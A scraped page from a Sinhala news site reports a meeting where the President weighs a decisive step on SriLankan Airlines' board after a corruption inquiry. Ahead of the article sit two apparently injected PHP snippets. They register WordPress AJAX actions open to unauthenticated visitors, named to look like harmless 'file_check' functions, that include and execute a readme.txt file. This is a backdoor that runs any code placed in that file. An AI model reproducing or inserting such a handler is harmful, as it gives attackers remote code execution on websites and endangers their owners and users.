if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ශ්‍රී ලන්කන් ගැන තීරණාත්මක තීන්දුවක් ගන්න ජනපති සූදානම් - mediahumanrights.lk
mediahumanrights.lk
Local News News Political

ශ්‍රී ලන්කන් ගැන තීරණාත්මක තීන්දුවක් ගන්න ජනපති සූදානම්

ශ්‍රී ලන්කන් ගුවන් සමාගමේ සිදූව ඇති දූෂණ සහ වංචා පරීක්ෂා කිරීම සඳහා නීතිඥ ඡේ.සී වැලිඅමුණගේ ප්‍රධානත්වයෙන් පත් කළ කමිටුවේ නිර්දේශ ඇතුලත් වාර්තාව වහාම ක්‍රියාත්මක කිරීමට රජය අද (20) තීරණය කළා.
ඒ ජනාධිපතිවරයාගේ ප්‍රධානත්වයෙන් ජනාධිපති ලේකම් කාර්යාලයේ පැවැති සාකච්ඡාවකදීයි. ශ්‍රී ලන්කන් ගුවන් සමාගමේ අධ්‍යක්ෂ මණ්ඩලය සිදූ කර ඇති අකටයුතුකම් පිළිබඳව මෙහිදී දිර්ඝ ලෙස සාකච්ඡා කෙරුනා.
සෞඛ්‍ය, පෝෂණ හා දේශීය වෛද්‍ය අමාත්‍ය දොස්තර රාජිත සේනාරත්න, විදේශ කටයුතු අමාත්‍ය රවී කරුණානායක, ප්‍රාදේශීය සංවර්ධන අමාත්‍ය සරත් ෆොන්සේකා ඇතුලු ඇමතිවරුන්, අධ්‍යක්ෂ මණ්ඩලය විසින් සිදූ කර ඇති වංචා සහ දූෂණ, අවිධිමත් පත් කිරිම් පිළිබඳව දිර්ඝ ලෙස කරුණු පෙන්වා දී තිබෙනවා.
මෙම අවස්ථාවට එක් වූ ශ්‍රී ලන්කන් ගුවන් සමාගමේ ප්‍රධාන විධායක නිලධාරීවරයාට එරෙහිව අධ්‍යක්ෂ මණ්ඩලයේම සාමාජිකයින් සිව්දෙනෙකු කරුණු ඉදිරිපත් කළා.
අධ්‍යක්ෂ මණ්ඩල සාමාජිකයින්ට විරුද්ධව අමාත්‍යවරුන් ඉදිරිපත් කරන චෝදනා සත්‍ය බවත්, අධ්‍යක්ෂ මණ්ඩලය බෙදී ඇති බවත්, ජනාධිපතිවරයා සඳහන් කර සිටියා.
එහිදී අදහස් දැක් වූ අග්‍රාමාත්‍යවරයා කියා සිටියේ ශ්‍රී ලන්කන් ගුවන් සමාගමේ අධ්‍යක්ෂ මණ්ඩලයේ අඩුපාඩු ඇති බවයි. නමුත් මෙම අධ්‍යක්ෂ මණ්ඩලය යටතේ අලාභය අවම කර ගැනීමට හැකි වූ බවත්, පරිපාලනමය ගැටලු විසඳා ගැනීම ඔවුන් සතු වගකීමක් බවත් පෙන්වා දූන්නා.
කෙසේවෙතත් ජනාධිපතිවරයා අවසානයේ ප්‍රකාශ කළේ ශ්‍රී ලන්කන් ගුවන් සමාගමේ අධ්‍යක්ෂ මණ්ඩලය සම්බන්ධයෙන් ඉදිරියේ දී තීරණාත්මක තීන්දූවක් ගන්නා බවයි.
(under the courtesy of nethfm news web)

Related posts

Channel4 මාරුවී චාමර සම්පත් Channel Eyeට දිගට හරහට බැනවදී…

Shiran Viraj

පාස්කු ප‍්‍රහාරය වැනි අන්තවාදී ප‍්‍රහාර එල්ල කිරිමේ අනතුරක්..- ජනපතිට ලිඛිතව දැනුම් දෙයි..

Shiran Viraj

මැතිවරණය කොටස් වශයෙන් පවත්වා සියළු ගැටළු නිරාකරණය කළ හැකි මාර්ගය මෙන්න

Shiran Viraj